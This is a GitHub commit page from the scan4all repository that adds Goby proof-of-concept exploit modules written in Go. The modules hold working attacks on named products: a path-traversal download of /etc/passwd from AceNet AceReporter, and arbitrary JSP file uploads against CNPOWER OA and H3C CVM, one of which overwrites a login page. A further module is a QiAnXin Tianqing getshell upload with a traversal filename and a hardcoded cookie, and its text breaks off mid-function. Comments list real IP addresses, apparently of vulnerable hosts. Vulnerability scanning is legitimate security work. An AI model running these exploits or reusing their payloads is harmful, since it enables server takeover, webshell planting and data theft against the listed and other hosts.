STRLCPY/scan4all

Merge pull request #114 from jusk9527/main
```
add goby poc
```
51pwn committed with GitHub 2 years ago

3ee9041f

2 parents
ed31dc9a
0d8ceadb

■ ■ ■ ■ ■ ■

lib/goby/goby_pocs/AceNet_AceReporter_Report_component_Arbitrary_file_download.txt

1	+	package exploits
2	+
3	+	import (
4	+	"git.gobies.org/goby/goscanner/goutils"
5	+	)
6	+
7	+	func init() {
8	+	expJson := `{
9	+	"Name": "AceNet AceReporter Report component Arbitrary file download",
10	+	"Description": "All firewall devices that use the AceNet AceReporter report component can download arbitrary files",
11	+	"Product": "AceNet AceReporter Report component",
12	+	"Homepage": "",
13	+	"DisclosureDate": "2021-08-04",
14	+	"Author": "[email protected]",
15	+	"GobyQuery": "title=\"Login @ Reporter\" \|\| title=\"Technology, Inc.\"",
16	+	"Level": "2",
17	+	"Impact": "<p><span style=\"font-size: 14px;\">The vulnerability of arbitrary file download or read is mainly caused by the fact that when the application system provides the function of file download or read, the application system directly specifies the file path in the file path parameter without verifying the validity of the file path. As a result, the attacker can jump through the directory (..</span><span style=\"font-size: 14px;\">\\ or..</span><span style=\"font-size: 14px;\">/) to download or read a file beyond the original specified path.</span><span style=\"font-size: 14px;\">The attacker can finally download or read any files on the system through this vulnerability, such as database files, application system source code, password configuration information and other important sensitive information, resulting in sensitive information leakage of the system.</span><br></p>",
18	+	"Recommandation": "<p><span style=\"font-size: 14px;\">Limit ..</span><span style=\"font-size: 14px;\">/ symbol is used to determine the input path when the file is downloaded. The best method is that the file should be one to one in the database, and avoid entering the absolute path to obtain the file</span><br></p>",
19	+	"References": [
20	+	"https://www.cnvd.org.cn/flaw/show/CNVD-2021-41972"
21	+	],
22	+	"HasExp": true,
23	+	"ExpParams": [
24	+	{
25	+	"name": "path",
26	+	"type": "createSelect",
27	+	"value": "../../../../../../../../../etc/passwd,../../../../../../../../../etc/hosts",
28	+	"show": ""
29	+	}
30	+	],
31	+	"ExpTips": {
32	+	"Type": "",
33	+	"Content": ""
34	+	},
35	+	"ScanSteps": [
36	+	"AND",
37	+	{
38	+	"Request": {
39	+	"method": "GET",
40	+	"uri": "/view/action/download_file.php?filename=../../../../../../../../../etc/passwd&savename=data.txt",
41	+	"follow_redirect": true,
42	+	"header": {},
43	+	"data_type": "text",
44	+	"data": ""
45	+	},
46	+	"ResponseTest": {
47	+	"type": "group",
48	+	"operation": "AND",
49	+	"checks": [
50	+	{
51	+	"type": "item",
52	+	"variable": "$body",
53	+	"operation": "contains",
54	+	"value": "root",
55	+	"bz": ""
56	+	},
57	+	{
58	+	"type": "item",
59	+	"variable": "$body",
60	+	"operation": "contains",
61	+	"value": "daemon",
62	+	"bz": ""
63	+	}
64	+	]
65	+	},
66	+	"SetVariable": []
67	+	},
68	+	{
69	+	"Request": {
70	+	"method": "GET",
71	+	"uri": "/view/action/download_file.php?filename=../../../../../../../../../etc/hosts&savename=data.txt",
72	+	"follow_redirect": true,
73	+	"header": {},
74	+	"data_type": "text",
75	+	"data": ""
76	+	},
77	+	"ResponseTest": {
78	+	"type": "group",
79	+	"operation": "AND",
80	+	"checks": [
81	+	{
82	+	"type": "item",
83	+	"variable": "$code",
84	+	"operation": "==",
85	+	"value": "200",
86	+	"bz": ""
87	+	},
88	+	{
89	+	"type": "item",
90	+	"variable": "$body",
91	+	"operation": "contains",
92	+	"value": "127.0.0.1",
93	+	"bz": ""
94	+	}
95	+	]
96	+	},
97	+	"SetVariable": []
98	+	}
99	+	],
100	+	"ExploitSteps": [
101	+	"AND",
102	+	{
103	+	"Request": {
104	+	"method": "GET",
105	+	"uri": "/view/action/download_file.php?filename={{{path}}}&savename=data.txt",
106	+	"follow_redirect": true,
107	+	"header": {},
108	+	"data_type": "text",
109	+	"data": ""
110	+	},
111	+	"SetVariable": [
112	+	"output\|lastbody"
113	+	]
114	+	}
115	+	],
116	+	"Tags": [
117	+	"file download"
118	+	],
119	+	"CVEIDs": null,
120	+	"CVSSScore": "0.0",
121	+	"AttackSurfaces": {
122	+	"Application": null,
123	+	"Support": null,
124	+	"Service": null,
125	+	"System": null,
126	+	"Hardware": null
127	+	}
128	+	}`
129	+
130	+	ExpManager.AddExploit(NewExploit(
131	+	goutils.GetFileName(),
132	+	expJson,
133	+	nil,
134	+	nil,
135	+	))
136	+	}
137	+

■ ■ ■ ■ ■ ■

lib/goby/goby_pocs/CNPOWER OA Arbitrary File Upload Vulnerability.txt

1	+	package exploits
2	+
3	+	import (
4	+	"git.gobies.org/goby/goscanner/goutils"
5	+	"git.gobies.org/goby/goscanner/jsonvul"
6	+	"git.gobies.org/goby/goscanner/scanconfig"
7	+	"git.gobies.org/goby/httpclient"
8	+	"regexp"
9	+	"strings"
10	+	)
11	+
12	+	func init() {
13	+	expJson := `{
14	+	"Name": "CNPOWER OA Arbitrary File Upload Vulnerability",
15	+	"Description": "<p>Huatian power collaborative office system combines advanced management ideas, management modes, software technology and network technology to provide users with a low-cost and efficient collaborative office and management platform. Wise managers have achieved good results in strengthening standardized workflow, strengthening team execution, promoting fine management and promoting business growth through the use of Huatian power collaborative office platform.<br></p><p>There is an arbitrary file upload vulnerability in Huatian power OA. Attackers can upload arbitrary files, obtain webshell, control server permissions, read sensitive information, etc.<br></p>",
16	+	"Product": "CNPOWER-OA",
17	+	"Homepage": "http://www.oa8000.com/",
18	+	"DisclosureDate": "2022-07-22",
19	+	"Author": "toto",
20	+	"FofaQuery": "body=\"/OAapp/WebObjects/OAapp.woa\" \|\| body=\"/OAapp/htpages/app\"",
21	+	"GobyQuery": "body=\"/OAapp/WebObjects/OAapp.woa\" \|\| body=\"/OAapp/htpages/app\"",
22	+	"Level": "2",
23	+	"Impact": "<p><span style=\"color: rgb(0, 0, 0); font-size: 16px;\">There is an arbitrary file upload vulnerability in Huatian power OA. Attackers can upload arbitrary files, obtain webshell, control server permissions, read sensitive information, etc.</span><br></p>",
24	+	"Recommendation": "<p>The manufacturer has not provided a vulnerability repair plan. Please pay attention to the update of the manufacturer's homepage:</p><p><a href=\"http://www.oa8000.com/\">http://www.oa8000.com/</a></p>",
25	+	"References": [
26	+	"http://www.oa8000.com"
27	+	],
28	+	"Is0day": false,
29	+	"HasExp": true,
30	+	"ExpParams": [
31	+	{
32	+	"name": "fileContent",
33	+	"type": "input",
34	+	"value": "<%out.println(\"123\");%>",
35	+	"show": ""
36	+	}
37	+	],
38	+	"ExpTips": {
39	+	"Type": "",
40	+	"Content": ""
41	+	},
42	+	"ScanSteps": [
43	+	"OR",
44	+	{
45	+	"Request": {
46	+	"method": "GET",
47	+	"uri": "/test.php",
48	+	"follow_redirect": true,
49	+	"header": {},
50	+	"data_type": "text",
51	+	"data": ""
52	+	},
53	+	"ResponseTest": {
54	+	"type": "group",
55	+	"operation": "AND",
56	+	"checks": [
57	+	{
58	+	"type": "item",
59	+	"variable": "$code",
60	+	"operation": "==",
61	+	"value": "200",
62	+	"bz": ""
63	+	},
64	+	{
65	+	"type": "item",
66	+	"variable": "$body",
67	+	"operation": "contains",
68	+	"value": "test",
69	+	"bz": ""
70	+	}
71	+	]
72	+	},
73	+	"SetVariable": []
74	+	}
75	+	],
76	+	"ExploitSteps": [
77	+	"AND",
78	+	{
79	+	"Request": {
80	+	"method": "GET",
81	+	"uri": "/test.php",
82	+	"follow_redirect": true,
83	+	"header": {},
84	+	"data_type": "text",
85	+	"data": ""
86	+	},
87	+	"ResponseTest": {
88	+	"type": "group",
89	+	"operation": "AND",
90	+	"checks": [
91	+	{
92	+	"type": "item",
93	+	"variable": "$code",
94	+	"operation": "==",
95	+	"value": "200",
96	+	"bz": ""
97	+	},
98	+	{
99	+	"type": "item",
100	+	"variable": "$body",
101	+	"operation": "contains",
102	+	"value": "test",
103	+	"bz": ""
104	+	}
105	+	]
106	+	},
107	+	"SetVariable": []
108	+	}
109	+	],
110	+	"Tags": [
111	+	"File Upload"
112	+	],
113	+	"VulType": [
114	+	"File Upload"
115	+	],
116	+	"CVEIDs": [
117	+	""
118	+	],
119	+	"CNNVD": [
120	+	""
121	+	],
122	+	"CNVD": [
123	+	""
124	+	],
125	+	"CVSSScore": "9.8",
126	+	"Translation": {
127	+	"CN": {
128	+	"Name": "华天动力 OA 任意文件上传漏洞",
129	+	"Product": "华天动力-OA",
130	+	"Description": "<p><span style=\"color: rgb(22, 28, 37); font-size: 16px;\">华天动力协同办公系统将先进的管理思想、管理模式和软件技术、网络技术相结合，为用户提供了低成本、高效能的协同办公和管理平台。睿智的管理者通过使用华天动力协同办公平台，在加强规范工作流程、强化团队执行、推动精细管理、促进营业增长等工作中取得了良好的成效。<br></span></p><p><span style=\"color: rgb(22, 28, 37); font-size: 16px;\">华天动力 OA </span><span style=\"color: rgb(22, 28, 37); font-size: 16px;\">存在任意文件上传漏洞，攻击者可以上传任意文件，获取 webshell，控制服务器权限，读取敏感信息等。</span><br></p>",
131	+	"Recommendation": "<p>目前官方尚未发布安全补丁，请关注厂商更新。<a href=\"http://www.oa8000.com/\">http://www.oa8000.com/</a></p>",
132	+	"Impact": "<p>华天动力 OA 存在任意文件上传漏洞，攻击者可以上传任意文件，获取 webshell，控制服务器权限，读取敏感信息等。</p>",
133	+	"VulType": [
134	+	"⽂件上传"
135	+	],
136	+	"Tags": [
137	+	"⽂件上传"
138	+	]
139	+	},
140	+	"EN": {
141	+	"Name": "CNPOWER OA Arbitrary File Upload Vulnerability",
142	+	"Product": "CNPOWER-OA",
143	+	"Description": "<p>Huatian power collaborative office system combines advanced management ideas, management modes, software technology and network technology to provide users with a low-cost and efficient collaborative office and management platform. Wise managers have achieved good results in strengthening standardized workflow, strengthening team execution, promoting fine management and promoting business growth through the use of Huatian power collaborative office platform.<br></p><p>There is an arbitrary file upload vulnerability in Huatian power OA. Attackers can upload arbitrary files, obtain webshell, control server permissions, read sensitive information, etc.<br></p>",
144	+	"Recommendation": "<p>The manufacturer has not provided a vulnerability repair plan. Please pay attention to the update of the manufacturer's homepage:</p><p><a href=\"http://www.oa8000.com/\">http://www.oa8000.com/</a></p>",
145	+	"Impact": "<p><span style=\"color: rgb(0, 0, 0); font-size: 16px;\">There is an arbitrary file upload vulnerability in Huatian power OA. Attackers can upload arbitrary files, obtain webshell, control server permissions, read sensitive information, etc.</span><br></p>",
146	+	"VulType": [
147	+	"File Upload"
148	+	],
149	+	"Tags": [
150	+	"File Upload"
151	+	]
152	+	}
153	+	},
154	+	"AttackSurfaces": {
155	+	"Application": null,
156	+	"Support": null,
157	+	"Service": null,
158	+	"System": null,
159	+	"Hardware": null
160	+	}
161	+	}`
162	+
163	+	getOAFilePath98234u293 := func(host *httpclient.FixUrl) string {
164	+	requestConfig := httpclient.NewPostRequestConfig("/OAapp/jsp/upload.jsp")
165	+	requestConfig.VerifyTls = false
166	+	requestConfig.FollowRedirect = false
167	+	requestConfig.Header.Store("Content-Type", "multipart/form-data; boundary=----WebKitFormBoundary5Ur8laykKAWws2QO")
168	+	requestConfig.Data = "------WebKitFormBoundary5Ur8laykKAWws2QO\r\nContent-Disposition: form-data; name=\"file\"; filename=\"xxx.xml\"\r\nContent-Type: image/png\r\n\r\nreal path\r\n------WebKitFormBoundary5Ur8laykKAWws2QO\r\nContent-Disposition: form-data; name=\"filename\"\r\n\r\nxxx.png\r\n------WebKitFormBoundary5Ur8laykKAWws2QO--\r\n"
169	+
170	+	if resp, err := httpclient.DoHttpRequest(host, requestConfig); err == nil {
171	+	if resp.StatusCode == 200 && strings.Contains(resp.Utf8Html, ".dat") {
172	+	if path := regexp.MustCompile(`(.?)Tomcat/webapps/.?\.dat`).FindStringSubmatch(resp.RawBody); len(path) > 1 {
173	+	// 直接返回文件最后一个 jsessionid
174	+	return path[1]
175	+	} else if path := regexp.MustCompile(`(.?)htoadata/appdata/.?\.dat`).FindStringSubmatch(resp.RawBody); len(path) > 1 {
176	+	return path[1]
177	+	}
178	+	}
179	+	}
180	+
181	+	return ""
182	+	}
183	+
184	+	exploitUploadFile837276342783 := func(path string, fileContent string, host *httpclient.FixUrl) bool {
185	+
186	+	requestConfig := httpclient.NewPostRequestConfig("/OAapp/htpages/app/module/trace/component/fileEdit/ntkoupload.jsp")
187	+	requestConfig.VerifyTls = false
188	+	requestConfig.FollowRedirect = false
189	+	requestConfig.Header.Store("Content-Type", "multipart/form-data; boundary=----WebKitFormBoundaryzRSYXfFlXqk6btQm")
190	+	requestConfig.Data = "------WebKitFormBoundaryzRSYXfFlXqk6btQm\r\nContent-Disposition: form-data; name=\"EDITFILE\"; filename=\"xxx.txt\"\r\nContent-Type: image/png\r\n\r\n" + fileContent + "\r\n------WebKitFormBoundaryzRSYXfFlXqk6btQm\r\nContent-Disposition: form-data; name=\"newFileName\"\r\n\r\n" + path + "Tomcat/webapps/OAapp/htpages/app/module/login/normalLoginPageForOther.jsp\r\n------WebKitFormBoundaryzRSYXfFlXqk6btQm--\r\n"
191	+
192	+	if resp, err := httpclient.DoHttpRequest(host, requestConfig); err == nil {
193	+	return resp.StatusCode == 200
194	+	}
195	+
196	+	return false
197	+	}
198	+
199	+	checkUploadedFile2398764278 := func(fileContent string, host *httpclient.FixUrl) bool {
200	+	requestConfig := httpclient.NewGetRequestConfig("/OAapp/htpages/app/module/login/normalLoginPageForOther.jsp")
201	+	requestConfig.VerifyTls = false
202	+	requestConfig.FollowRedirect = false
203	+
204	+	if resp, err := httpclient.DoHttpRequest(host, requestConfig); err == nil {
205	+	return resp.StatusCode == 200 && strings.Contains(resp.RawBody, fileContent)
206	+	}
207	+
208	+	return false
209	+	}
210	+
211	+	ExpManager.AddExploit(NewExploit(
212	+	goutils.GetFileName(),
213	+	expJson,
214	+	func(exp jsonvul.JsonVul, u httpclient.FixUrl, ss *scanconfig.SingleScanConfig) bool {
215	+
216	+	path := getOAFilePath98234u293(u)
217	+	if path == "" {
218	+	path = "D:/htoa/"
219	+	}
220	+
221	+	rand := goutils.RandomHexString(6)
222	+
223	+	if exploitUploadFile837276342783(path, "<%out.print(\""+rand+"\");%>", u) {
224	+	return checkUploadedFile2398764278(rand, u)
225	+
226	+	}
227	+
228	+	return false
229	+	},
230	+	func(expResult jsonvul.ExploitResult, ss scanconfig.SingleScanConfig) *jsonvul.ExploitResult {
231	+
232	+	fileContent := ss.Params["fileContent"].(string)
233	+
234	+	path := getOAFilePath98234u293(expResult.HostInfo)
235	+	if path == "" {
236	+	path = "D:/htoa/"
237	+	}
238	+
239	+	if exploitUploadFile837276342783(path, fileContent, expResult.HostInfo) {
240	+	expResult.Success = true
241	+	expResult.Output = "文件已上传，请访问：/OAapp/htpages/app/module/login/normalLoginPageForOther.jsp"
242	+	}
243	+
244	+	return expResult
245	+	},
246	+	))
247	+	}
248	+
249	+	// http://36.133.113.253:8081
250	+	// http://221.229.120.251:800/
251	+	// http://winnertoke.com:6001/

■ ■ ■ ■ ■ ■

lib/goby/goby_pocs/H3C CVM Arbitrary File Upload Vulnerability.txt

1	+	package exploits
2	+
3	+	import (
4	+	"git.gobies.org/goby/goscanner/goutils"
5	+	"git.gobies.org/goby/goscanner/jsonvul"
6	+	"git.gobies.org/goby/goscanner/scanconfig"
7	+	"git.gobies.org/goby/httpclient"
8	+	"strings"
9	+	)
10	+
11	+	func init() {
12	+	expJson := `{
13	+	"Name": "H3C CVM Arbitrary File Upload Vulnerability",
14	+	"Description": "<p><span style=\"color: var(--primaryFont-color);\">H3C company relies on its strong technical strength, product and service advantages, as well as the popular customer-centric concept to provide optimized virtualization and cloud business operation solutions for the IAAs cloud computing infrastructure of enterprise data center. Through the H3C CAS CVM virtualization management system, we can realize the central management and control of the virtualized environment in the data center. With a simple management interface, we can uniformly manage all physical and virtual resources in the data center, which can not only improve the management and control ability of administrators, simplify daily routine work, but also reduce the complexity and management cost of the IT environment.</span></p><p><span style=\"color: var(--primaryFont-color);\">H3C-CVM has an arbitrary file upload vulnerability, which allows attackers to upload arbitrary files, obtain webshell, control server permissions, read sensitive information, etc.</span><br></p>",
15	+	"Product": "H3C-CVM",
16	+	"Homepage": "http://www.h3c.com/cn/Service/Document_Software/Software_Download/H3Cloud/Catalog/Cloud_Virtualization/CAS_CVM/",
17	+	"DisclosureDate": "2022-05-25",
18	+	"Author": "[email protected]",
19	+	"FofaQuery": " server=\"H3C-CVM\" \|\| (banner=\"H3C-CVM\" && banner=\"Server: \")",
20	+	"GobyQuery": " server=\"H3C-CVM\" \|\| (banner=\"H3C-CVM\" && banner=\"Server: \")",
21	+	"Level": "3",
22	+	"Impact": "<p><span style=\"color: rgb(22, 28, 37); font-size: 16px;\">H3C-CVM has an arbitrary file upload vulnerability, which allows attackers to upload arbitrary files, obtain webshell, control server permissions, read sensitive information, etc.</span><br></p>",
23	+	"Recommendation": "<p>At present, the official has not released a security patch, please pay attention to the manufacturer's update.<a href=\"http://www.h3c.com/cn/Service/Document_Software/Software_Download/H3Cloud/Catalog/Cloud_Virtualization/CAS_CVM/\" target=\"_blank\">http://www.h3c.com/cn/Service/Document_Software/Software_Download/H3Cloud/Catalog/Cloud_Virtualization/CAS_CVM/</a><br></p>",
24	+	"References": [
25	+	"https://fofa.so/"
26	+	],
27	+	"Is0day": false,
28	+	"HasExp": true,
29	+	"ExpParams": [
30	+	{
31	+	"name": "fileName",
32	+	"type": "input",
33	+	"value": "evil",
34	+	"show": ""
35	+	},
36	+	{
37	+	"name": "fileContent",
38	+	"type": "input",
39	+	"value": "<%out.println(\"123\");%>",
40	+	"show": ""
41	+	}
42	+	],
43	+	"ExpTips": {
44	+	"Type": "",
45	+	"Content": ""
46	+	},
47	+	"ScanSteps": [
48	+	"AND",
49	+	{
50	+	"Request": {
51	+	"method": "GET",
52	+	"uri": "/test.php",
53	+	"follow_redirect": true,
54	+	"header": {},
55	+	"data_type": "text",
56	+	"data": ""
57	+	},
58	+	"ResponseTest": {
59	+	"type": "group",
60	+	"operation": "AND",
61	+	"checks": [
62	+	{
63	+	"type": "item",
64	+	"variable": "$code",
65	+	"operation": "==",
66	+	"value": "200",
67	+	"bz": ""
68	+	},
69	+	{
70	+	"type": "item",
71	+	"variable": "$body",
72	+	"operation": "contains",
73	+	"value": "test",
74	+	"bz": ""
75	+	}
76	+	]
77	+	},
78	+	"SetVariable": []
79	+	}
80	+	],
81	+	"ExploitSteps": [
82	+	"AND",
83	+	{
84	+	"Request": {
85	+	"method": "GET",
86	+	"uri": "/test.php",
87	+	"follow_redirect": true,
88	+	"header": {},
89	+	"data_type": "text",
90	+	"data": ""
91	+	},
92	+	"ResponseTest": {
93	+	"type": "group",
94	+	"operation": "AND",
95	+	"checks": [
96	+	{
97	+	"type": "item",
98	+	"variable": "$code",
99	+	"operation": "==",
100	+	"value": "200",
101	+	"bz": ""
102	+	},
103	+	{
104	+	"type": "item",
105	+	"variable": "$body",
106	+	"operation": "contains",
107	+	"value": "test",
108	+	"bz": ""
109	+	}
110	+	]
111	+	},
112	+	"SetVariable": []
113	+	}
114	+	],
115	+	"Tags": [
116	+	"Arbitrary File Creation"
117	+	],
118	+	"VulType": [
119	+	"Arbitrary File Creation"
120	+	],
121	+	"CVEIDs": [
122	+	""
123	+	],
124	+	"CNNVD": [
125	+	""
126	+	],
127	+	"CNVD": [
128	+	""
129	+	],
130	+	"CVSSScore": "8.0",
131	+	"Translation": {
132	+	"CN": {
133	+	"Name": "H3C CVM 前台任意文件上传漏洞",
134	+	"Product": "H3C-CVM",
135	+	"Description": "<p>H3C 公司依托其强大的技术实力、产品与服务优势，以及深入人心的以客户为中心的理念，为企业数据中心 IaaS 云计算基础架构提供最优化的虚拟化与云业务运营解决方案。通过 H3C CAS CVM 虚拟化管理系统实现数据中心虚拟化环境的中央管理控制，以简洁的管理界面，统一管理数据中心内所有的物理资源和虚拟资源，不仅能提高管理员的管控能力、简化日常例行工作，更可降低 IT 环境的复杂度和管理成本。<br></p><p><span style=\"color: rgb(22, 28, 37); font-size: 16px;\">H3C CVM 存在任意文件上传漏洞，攻击者可以上传任意文件，获取 webshell，控制服务器权限，读取敏感信息等。</span><br></p>",
136	+	"Recommendation": "<p>目前官方尚未发布安全补丁，请关注厂商更新。<a href=\"http://www.h3c.com/cn/Service/Document_Software/Software_Download/H3Cloud/Catalog/Cloud_Virtualization/CAS_CVM/\" target=\"_blank\">http://www.h3c.com/cn/Service/Document_Software/Software_Download/H3Cloud/Catalog/Cloud_Virtualization/CAS_CVM/</a><br></p>",
137	+	"Impact": "<p><span style=\"color: rgb(22, 28, 37); font-size: 16px;\"><span style=\"color: rgb(22, 28, 37); font-size: 16px;\">H3C CVM</span><span style=\"color: rgb(22, 28, 37); font-size: 16px;\"> </span>存在任意文件上传漏洞，攻击者可以上传任意文件，获取 webshell，控制服务器权限，读取敏感信息等。</span><br></p>",
138	+	"VulType": [
139	+	"⽂件上传"
140	+	],
141	+	"Tags": [
142	+	"⽂件上传"
143	+	]
144	+	},
145	+	"EN": {
146	+	"Name": "H3C CVM Arbitrary File Upload Vulnerability",
147	+	"Product": "H3C-CVM",
148	+	"Description": "<p><span style=\"color: var(--primaryFont-color);\">H3C company relies on its strong technical strength, product and service advantages, as well as the popular customer-centric concept to provide optimized virtualization and cloud business operation solutions for the IAAs cloud computing infrastructure of enterprise data center. Through the H3C CAS CVM virtualization management system, we can realize the central management and control of the virtualized environment in the data center. With a simple management interface, we can uniformly manage all physical and virtual resources in the data center, which can not only improve the management and control ability of administrators, simplify daily routine work, but also reduce the complexity and management cost of the IT environment.</span></p><p><span style=\"color: var(--primaryFont-color);\">H3C-CVM has an arbitrary file upload vulnerability, which allows attackers to upload arbitrary files, obtain webshell, control server permissions, read sensitive information, etc.</span><br></p>",
149	+	"Recommendation": "<p>At present, the official has not released a security patch, please pay attention to the manufacturer's update.<a href=\"http://www.h3c.com/cn/Service/Document_Software/Software_Download/H3Cloud/Catalog/Cloud_Virtualization/CAS_CVM/\" target=\"_blank\">http://www.h3c.com/cn/Service/Document_Software/Software_Download/H3Cloud/Catalog/Cloud_Virtualization/CAS_CVM/</a><br></p>",
150	+	"Impact": "<p><span style=\"color: rgb(22, 28, 37); font-size: 16px;\">H3C-CVM has an arbitrary file upload vulnerability, which allows attackers to upload arbitrary files, obtain webshell, control server permissions, read sensitive information, etc.</span><br></p>",
151	+	"VulType": [
152	+	"Arbitrary File Creation"
153	+	],
154	+	"Tags": [
155	+	"Arbitrary File Creation"
156	+	]
157	+	}
158	+	},
159	+	"AttackSurfaces": {
160	+	"Application": null,
161	+	"Support": null,
162	+	"Service": null,
163	+	"System": null,
164	+	"Hardware": null
165	+	}
166	+	}`
167	+
168	+	exploitUploadFile2398429842 := func(fileName string, fileContent string, host *httpclient.FixUrl) bool {
169	+
170	+	// 上传文件
171	+	requestConfig := httpclient.NewPostRequestConfig("/cas/fileUpload/upload?token=/../../../../../var/lib/tomcat8/webapps/cas/js/lib/buttons/" + fileName + ".jsp&name=222")
172	+	requestConfig.VerifyTls = false
173	+	requestConfig.FollowRedirect = false
174	+	requestConfig.Header.Store("Content-range", "bytes 0-10/20")
175	+	requestConfig.Header.Store("Referer", "http://"+host.HostInfo+"/cas/login")
176	+	requestConfig.Data = fileContent
177	+
178	+	if resp, err := httpclient.DoHttpRequest(host, requestConfig); err == nil {
179	+	if resp.StatusCode == 200 && strings.Contains(resp.Utf8Html, "\"success\\\":true") {
180	+	return true
181	+	}
182	+	}
183	+
184	+	return false
185	+	}
186	+
187	+	checkUploadFile12312313810923 := func(fileName string, fileContent string, host *httpclient.FixUrl) bool {
188	+
189	+	requestConfig := httpclient.NewGetRequestConfig("/" + fileName)
190	+	requestConfig.VerifyTls = false
191	+	requestConfig.FollowRedirect = false
192	+
193	+	if resp, err := httpclient.DoHttpRequest(host, requestConfig); err == nil {
194	+	return resp.StatusCode == 200 && strings.Contains(resp.Utf8Html, fileContent)
195	+	}
196	+
197	+	return false
198	+	}
199	+
200	+	ExpManager.AddExploit(NewExploit(
201	+	goutils.GetFileName(),
202	+	expJson,
203	+	func(exp jsonvul.JsonVul, u httpclient.FixUrl, ss *scanconfig.SingleScanConfig) bool {
204	+
205	+	rand := goutils.RandomHexString(6)
206	+	rand2 := goutils.RandomHexString(6)
207	+
208	+	if exploitUploadFile2398429842(rand2, "<%out.print(\""+rand+"\");%>", u) {
209	+	return checkUploadFile12312313810923("/cas/js/lib/buttons/"+rand2+".jsp", rand, u)
210	+	}
211	+
212	+	return false
213	+	},
214	+	func(expResult jsonvul.ExploitResult, ss scanconfig.SingleScanConfig) *jsonvul.ExploitResult {
215	+
216	+	fileContent := ss.Params["fileContent"].(string)
217	+	fileName := ss.Params["fileName"].(string)
218	+
219	+	if exploitUploadFile2398429842(fileName, fileContent, expResult.HostInfo) {
220	+
221	+	expResult.Success = true
222	+	expResult.Output = "文件上传已成功，请检查路径：/cas/js/lib/buttons/" + fileName + ".jsp"
223	+	}
224	+
225	+	return expResult
226	+	},
227	+	))
228	+	}
229	+
230	+	// http://183.63.173.141:8080/
231	+	// https://60.190.202.42:8443/
232	+	// http://61.53.232.5:28080/

■ ■ ■ ■ ■ ■

lib/goby/goby_pocs/QiAnXin_Tianqing_terminal_security_management_system_client_upload_file.json_getshell.txt

1	+	package exploits
2	+
3	+	import (
4	+	"fmt"
5	+	"git.gobies.org/goby/goscanner/goutils"
6	+	"git.gobies.org/goby/goscanner/jsonvul"
7	+	"git.gobies.org/goby/goscanner/scanconfig"
8	+	"git.gobies.org/goby/httpclient"
9	+	"strings"
10	+	)
11	+
12	+	func init() {
13	+	expJson := `{
14	+	"Name": "QiAnXin Tianqing terminal security management system client_upload_file.json getshell",
15	+	"Description": "There is an arbitrary file upload vulnerability in QiAnXin Tianqing terminal security management system, and the attacker can upload his own webshell to control the server.",
16	+	"Product": "360-TianQing",
17	+	"Homepage": "https://www.qianxin.com/product/detail/pid/49",
18	+	"DisclosureDate": "2021-04-09",
19	+	"Author": "[email protected]",
20	+	"FofaQuery": "app=\"360-TianQing\"",
21	+	"GobyQuery": "app=\"360-TianQing\"",
22	+	"Level": "3",
23	+	"Impact": "",
24	+	"Recommendation": "",
25	+	"References": [
26	+	"http://fofa.so"
27	+	],
28	+	"HasExp": true,
29	+	"ExpParams": [
30	+	{
31	+	"name": "cmd",
32	+	"type": "input",
33	+	"value": "whoami"
34	+	}
35	+	],
36	+	"ExpTips": {
37	+	"Type": "",
38	+	"Content": ""
39	+	},
40	+	"ScanSteps": [
41	+	"AND",
42	+	{
43	+	"Request": {
44	+	"data": "",
45	+	"data_type": "text",
46	+	"follow_redirect": true,
47	+	"method": "GET",
48	+	"uri": "/"
49	+	},
50	+	"ResponseTest": {
51	+	"checks": [
52	+	{
53	+	"bz": "",
54	+	"operation": "==",
55	+	"type": "item",
56	+	"value": "200",
57	+	"variable": "$code"
58	+	}
59	+	],
60	+	"operation": "AND",
61	+	"type": "group"
62	+	}
63	+	}
64	+	],
65	+	"ExploitSteps": null,
66	+	"Tags": ["getshell"],
67	+	"CVEIDs": null,
68	+	"CVSSScore": "0.0",
69	+	"AttackSurfaces": {
70	+	"Application": ["360-TianQing"],
71	+	"Support": null,
72	+	"Service": null,
73	+	"System": null,
74	+	"Hardware": null
75	+	}
76	+	}`
77	+
78	+	ExpManager.AddExploit(NewExploit(
79	+	goutils.GetFileName(),
80	+	expJson,
81	+	func(exp jsonvul.JsonVul, u httpclient.FixUrl, ss *scanconfig.SingleScanConfig) bool {
82	+	randomFilename := goutils.RandomHexString(4)
83	+	cfg := httpclient.NewPostRequestConfig(fmt.Sprintf("/api/client_upload_file.json?mid=202cb962ac59075b964b07152d234b10&md5=3cb95cfbe1035bce8c448fcaf80fe7d9&filename=../../lua/%s.LUAC", randomFilename))
84	+	cfg.VerifyTls = false
85	+	cfg.FollowRedirect = false
86	+	cfg.Header.Store("Referer", u.FixedHostInfo)
87	+	cfg.Header.Store("Cookie", "SKYLARe6721bd9ccd89f1a7ee7d79d35=71jm0o74c4k934fqechjeau0f7; YII_CSRF_TOKEN=74eae12048c53a096d8053873d9462ad07f1c51cs%3A40%3A%228a2d2746bb28b7bb46f038160b5e2c6d5b095d64%22%3B")
88	+	cfg.Header.Store("Content-Type", "multipart/form-data; boundary=----WebKitFormBoundaryLx7ATxHThfk91oxQ")
89	+	cfg.Data = "------WebKitFormBoundaryLx7ATxHThfk91oxQ\r\n"
90	+	cfg.Data += "Content-Disposition: form-data; name=\"file\"; filename=\"flash.php\"\r\n"
91	+	cfg.Data += "Content-Type: application/xxxx\r\n\r\n"
92	+	cfg.Data += "hello,world\r\n"
93	+	cfg.Data += "------WebKitFormBoundaryLx7ATxHThfk91oxQ--"
94	+	if resp, err := httpclient.DoHttpRequest(u, cfg); err == nil && resp.StatusCode == 200 {
95	+	return strings.Contains(resp.Utf8Html, "\"status\":true") &&
96	+	strings.Contains(resp.Utf8Html, "upload file success")
97	+	}
98	+	return false
99	+	},
100	+	func(expResult jsonvul.ExploitResult, ss scanconfig.SingleScanConfig) *jsonvul.ExploitResult {
101	+	randomFilename := goutils.RandomHexString(4)
102	+	cfg := httpclient.NewPostRequestConfig(fmt.Sprintf("/api/client_upload_file.json?mid=202cb962ac59075b964b07152d234b10&md5=88aca4dfc84d8abd8c2b01a572d60339&filename=../../lua/%s.LUAC", randomFilename))
103	+	//cfg := httpclient.NewPostRequestConfig("/api/client_upload_file.json?mid=202cb962ac59075b964b07152d234b10&md5=88aca4dfc84d8abd8c2b01a572d60339&filename=../../lua/sky.LUAC")
104	+	cfg.VerifyTls = false
105	+	cfg.FollowRedirect = false
106	+	cfg.Header.Store("Referer", expResult.HostInfo.FixedHostInfo)
